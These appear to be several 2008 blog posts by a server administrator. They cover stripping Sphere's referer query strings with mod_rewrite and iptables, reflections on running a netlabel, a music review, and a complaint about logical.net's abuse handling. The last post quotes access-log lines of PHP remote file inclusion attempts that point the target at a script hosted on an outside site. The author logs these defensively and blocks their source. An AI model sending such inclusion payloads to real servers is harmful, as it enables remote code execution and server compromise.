Sphere adding query strings to search results
During my usual daily administrative tasks, I was less than pleased to discover that someone at Sphere apparently came up with a new idea. Or perhaps that idea has been around for quite a long time and I was merely fortunate enough to have been spared from learning of its existence. For those who do not know what I am referring to, here is a short explanation:
Sphere offer a widget for blogs that tries to present related blogposts for a particular subject. Perhaps not a bad idea in itself, maybe even a boon to those who want to research a subject and have a handy tool to consult more than one source prior to adding their own thoughts. However, there seem to be some issues:
A referer=sphere_search query string is appended to the links in this widget. Even worse, it seems that other search engines are encouraged to crawl these modified links. As a search engine bot cannot differentiate between a useless query string and one that has been added on purpose, it will treat the original and the modified link as two separate pages showing the same content, and ultimately this can lead to the receiving end being hit by dreaded duplicate content penalties.
Google demonstrates that quite a few sites now have to put up with indexed pages they never wanted to have this way:
http://www.google.com/search?q=inurl:referer=sphere_search
This pretty much looks to me like some marketing expert had the brilliant idea of introducing the referrer tracking model of the adult content industry to the mainstream without the affected webmasters’ consent. If you have been hit by this nonsense too, you can easily spot it in your logfiles, like I did this morning:
66.249.73.232 - - [28/Dec/2008:11:18:13 +0100] "GET /goals-for-2008-revisited?referer=sphere_search HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.232 - - [28/Dec/2008:11:18:14 +0100] "GET /goals-for-2008-revisited/?referer=sphere_search HTTP/1.1" 200 11189 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
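For those who would rather not eyeball their logfiles, here is a minimal Python sketch that picks out requests carrying the parameter. It assumes the Apache combined log format with plain ASCII quotes; the function name `sphere_hits` and the third sample line (a made-up request from a documentation address) are illustrations only and do not come from my logs.

```python
import re

# Matches the request field of a combined-format log line and captures the
# requested path when its query string begins with referer=sphere.
SPHERE_REQUEST = re.compile(r'"GET (\S+)\?referer=sphere\S* HTTP/[\d.]+"', re.IGNORECASE)

def sphere_hits(lines):
    """Return the requested paths of all log lines carrying the Sphere parameter."""
    hits = []
    for line in lines:
        match = SPHERE_REQUEST.search(line)
        if match:
            hits.append(match.group(1))
    return hits

sample = [
    '66.249.73.232 - - [28/Dec/2008:11:18:13 +0100] "GET /goals-for-2008-revisited?referer=sphere_search HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.73.232 - - [28/Dec/2008:11:18:14 +0100] "GET /goals-for-2008-revisited/?referer=sphere_search HTTP/1.1" 200 11189 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    # Hypothetical unaffected request, added only to show a non-match
    '192.0.2.1 - - [28/Dec/2008:11:20:00 +0100] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

print(sphere_hits(sample))
```

To run it against a real logfile, pass the open file object instead of `sample`; the path of that file depends on your setup.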
You may notice that the first request omitted the terminating slash of the URI, a bad habit Sphere’s bot has been exhibiting for years without anyone bothering to fix it. Now the hassle of addressing these malformed requests in order to limit the damage they can do has been added to the mix. Apache users may like to use a mod_rewrite rule similar to this to work around the problem:
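# broken sphere search (written for use in .htaccess)
# act only when a query string is present ...
RewriteCond %{QUERY_STRING} .
# ... and it begins with referer=sphere (case-insensitive)
RewriteCond %{QUERY_STRING} ^referer=sphere [NC]
# capture the path without a trailing slash, then redirect to the path plus
# exactly one slash; the trailing "?" drops the query string
RewriteRule ^(.*?)/?$ http://www.example.com/$1/? [R=301,L]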
I assume you know how to use mod_rewrite. In case you don’t, please google for the basics before using this code, as inappropriate usage without understanding the implications can wreak havoc on a server. Here is a brief explanation of what it does:
First it is checked whether a query string is present and, if so, whether it begins with “referer=sphere”. If it does, a 301 redirect is forced that strips this query string and re-adds the omitted terminal slash of our fake directory path. The stripping is done by the question mark appended to the end of the substitution URL: an empty query string replaces the original one. Now, when disaster has struck one of our pages, bots can be led to the actual source no matter what rubbish was originally picked up.
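To make the intended effect of the redirect easier to follow, here is a rough Python sketch of the same logic. It is not what Apache executes internally, merely an illustration; the function name `strip_sphere_referer` is made up, and unlike a rule that appends a slash unconditionally this sketch adds the slash only when it is missing.

```python
from urllib.parse import urlsplit, urlunsplit

def strip_sphere_referer(url):
    """Return the clean redirect target, or None if the URL is left alone."""
    parts = urlsplit(url)
    # Same test as the second RewriteCond: query string begins with referer=sphere
    if not parts.query.lower().startswith("referer=sphere"):
        return None
    # Re-add the terminal slash only when the request omitted it
    path = parts.path if parts.path.endswith("/") else parts.path + "/"
    # Rebuild the URL with an empty query string and no fragment
    return urlunsplit((parts.scheme, parts.netloc, path, "", ""))

print(strip_sphere_referer("http://www.example.com/goals-for-2008-revisited?referer=sphere_search"))
print(strip_sphere_referer("http://www.example.com/goals-for-2008-revisited/?referer=sphere_search"))
print(strip_sphere_referer("http://www.example.com/goals-for-2008-revisited/"))
```

Both polluted variants end up at the same clean address, while the untouched URL yields None, which means no redirect.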
Of course this is merely curing symptoms. The source of the problem is this moronic addition of a query string which can only be fixed by Sphere. Surely I’m not the only one on this planet who feels annoyed by such nonsensical additions and perhaps in the end you can only opt out from their crawling:
The responsible outfit is located in this little corner of the web:
Votenet Solutions Inc, SAVV-S234898-5 (NET-64-14-117-224-1)
64.14.117.224 - 64.14.117.255
which equates to 64.14.117.224/27.
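If you do not trust my mental arithmetic, the conversion from an address range to CIDR notation can be checked with Python’s standard ipaddress module. This is just a quick sanity check using the two addresses from the whois output above; the variable names are arbitrary.

```python
import ipaddress

first = ipaddress.IPv4Address("64.14.117.224")
last = ipaddress.IPv4Address("64.14.117.255")

# summarize_address_range yields the networks that exactly cover first..last
networks = list(ipaddress.summarize_address_range(first, last))

print(networks)                   # [IPv4Network('64.14.117.224/27')]
print(networks[0].num_addresses)  # 32
```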
Opt-out can be understood in five, ten, fiftyfold ways:
One may add an entry to robots.txt, another to .htaccess or httpd.conf (depending on shared/dedicated hosting) and freaks like me prefer using iptables, so they need not see the clutter of failed requests in their logfiles:
# sphere.com: broken link generation
iptables -A INPUT -s 64.14.117.224/27 -i eth0 -j DROP
That should put an end to the affiliate link mess.
I cannot confidently say that I reached what I had in mind. Perhaps lack of effort, motivation to reach more. What I learnt though is that it is all about creating an illusion. Were I to revisit the idea of a netlabel today, I would advise to:
quit critical thinking and get used to presenting claims as undisputed facts
get used to considering an audience as helpless masses which eagerly await your instructions
exaggerate an artist’s, label’s or reviewer’s importance when outlining his achievements
emulate images, poses and phrases from today’s top mainstream stars
find use and content in every submission and instruct people to do so, too
create accounts on every social networking site there is and collect strategically important friends
constantly repeat desired attributes people shall associate with you, your label and your artists
never argue with label owners or artists no matter how justified it appears
be sure to religiously follow the latest trends in music, buzzwords, gadgets and web services
enrich Wikipedia with articles about your netlabel and its artists to inflate your importance
How about contacts? Some never get back to me in time, others confuse me with the doctor in ward nr. 6 or expect me to unconditionally admire them. Sometimes none of the former is happening, but in this case you can be sure that the conversation will die once the other side has accomplished its goals. Wear a mask, get used to it. There is no friendship, only different shades of solitude: One that manifests itself with being a stranger amongst many “friends”, another that unexpectedly cuts off conversations or one that never gets started at all.
If there was a change in 2008 then it was an increasing reluctance to write about myself or subjects in general. Writing always implies importance of a subject. Thoughtless writing, however, can inadvertently heighten subjects to an importance they never had. I approached the edge staring in Thanatos’ face and struggled to escape. He poisoned my thoughts, emphasising monotony, hopelessness and ignorance and yet I continued for reasons unknown to me.
I wrote better music and made better photographs, but my output slowed down notably towards the second half of the year. Perhaps the greatest advances were related to design. A mixed year. Things never turn out the way one would like to see them and instead prefer a steady state.
[tube150] Naoto Taguchi Untitled 9 Fragments Ordinaries Sound Materials
Naoto Taguchi, originally from Sapporo and currently living in Tokyo, is an audiovisual artist with a strong musical background (having played the piano since his early childhood) who is also interested in programming, photography, design in general and spinning records as a DJ. He locates himself within a triangle of minimalist electronica, dubmatics and quirky experimental sounds, and his latest release on test tube, entitled untitled 9 fragments ordinaries sound materials, concentrates on the experimental side of his oeuvre.
The main concept consists of chopped sound snippets that were rearranged in a way that they exhibit musical qualities despite a rather unmusical approach (a technique pioneered by Oval in the last century). The sound elements are not exactly repeated and therefore subtle changes prevail with each layer added and subtracted, as is characteristic of a Minimalist music approach. Naoto Taguchi’s focus is keeping a snapshot of a moment, just like a photograph that slowly reveals its details as the viewer gets lost in it. Untitled 9 Fragments Ordinaries Sound Materials uses the brightest colours for painting its soundscapes I’ve come across in a long time. It breathes the atmosphere of a sunny day at the coastline with sparkling reflections of waves in contre jour and seems to leave troubled thoughts and conflicts behind. This brightness finds its equivalent in patches of crystalline sounds slowly passing by like fibrous, wind-torn cirrus clouds.
That these fragments are not charged with meaningful titles or philosophical instructions can be seen as a boon, and the strong suggestive motifs enforcing intense associations make any kind of instructions superfluous anyway. The only point where I could see some room for improvement is of a technical nature: the tracks have apparently been limited a bit too much, and as such most dynamic differences were levelled, with a notable pumping effect on former sound spikes. Apart from this minor issue, Naoto Taguchi’s Untitled 9 Fragments Ordinaries Sound Materials is a truly wonderful release, probably one of my favourites of 2008, which demonstrates that even music rooted in tonality can exhibit most interesting structures if a skilled musician sets no limits to his imagination.
Update 27/12/08: Whilst the TestTube liner notes for today wrote about a late Christmas gift, the release was well in time for Leftob audio cast regulars, since I added the release to the playlist on December 24th – 3 days ahead of the official release date ;-)
Logical.net – abuse reports discouraged
I merely meant to be helpful when I took the time to notify logical.net of a compromised server, possibly running an unpatched cPanel version, that was hitting one of the servers I administer with attempts at PHP remote file inclusion:
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 217 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 227 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 235 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:31 +0100] "GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 232 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 256 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 259 "-" "Mozilla/5.0"
209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.
When looking up the address, I noticed that logical.net did not differentiate between ranges for Internet service to end users and webhosting, so unless you scan PTR records you may have no way of telling them apart. There is just one block for everything:
OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US
NetRange: 209.23.0.0 - 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30
Nor could their routing give any more hints (sometimes it does):
route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL – Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS
According to whois, they at least have an abuse address, and one is tempted to think that it was added for a reason other than looking “anti-spam”. As I had to discover right after sending my abuse report, this does not seem to be the case with logical.net. Here is the automatic ignore-bot reply I instantly received from them:
From: “Support” <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02
Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/
Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.
Support
Note that I did write to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of negligent, ignorant or even malicious network owners. I merely sent out a courtesy notice as I figured a compromised cPanel may be some kind of disaster for those who maintain their servers/domains with it. But apparently I was mistaken. Do logical.net really believe they are so special that I would happily jump through their hoops just to notify them of their own negligence (notice the absurdity)? I can’t believe anyone in their right mind would cherish such a crazy notion, therefore I conclude third party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.
How to block them from accessing my webservers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 which the compromised machine is part of is exclusively populated by servers, mainly mailservers, but some webservers, too. The same applies to the neighbouring /24, so I resolved the problem by adding the following entry to both my mail- and webservers:
# logical.net do not wish to receive abuse reports
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT
This way, if one of their mailservers should suddenly opt for spewing spam, I have the peace of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.
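As a footnote on the 209.23.116.0/23 used in the rule above: the following small Python sketch shows how two adjacent /24 networks collapse into that single /23. It assumes the neighbouring block is 209.23.117.0/24, which I infer from the /23 itself; the variable names are arbitrary.

```python
import ipaddress

server_block = ipaddress.ip_network("209.23.116.0/24")  # contains the compromised machine
neighbour = ipaddress.ip_network("209.23.117.0/24")     # assumed neighbouring /24
allocation = ipaddress.ip_network("209.23.0.0/17")      # whole block from the whois output
offender = ipaddress.ip_address("209.23.116.97")

# collapse_addresses merges adjacent networks into the fewest possible prefixes
merged = list(ipaddress.collapse_addresses([server_block, neighbour]))

print(merged)                                                     # [IPv4Network('209.23.116.0/23')]
print(offender in merged[0])                                      # True
print(merged[0].num_addresses, "of", allocation.num_addresses)    # 512 of 32768
```

So the rule touches 512 addresses out of the 32768 in the whole allocation, leaving the rest of the block alone.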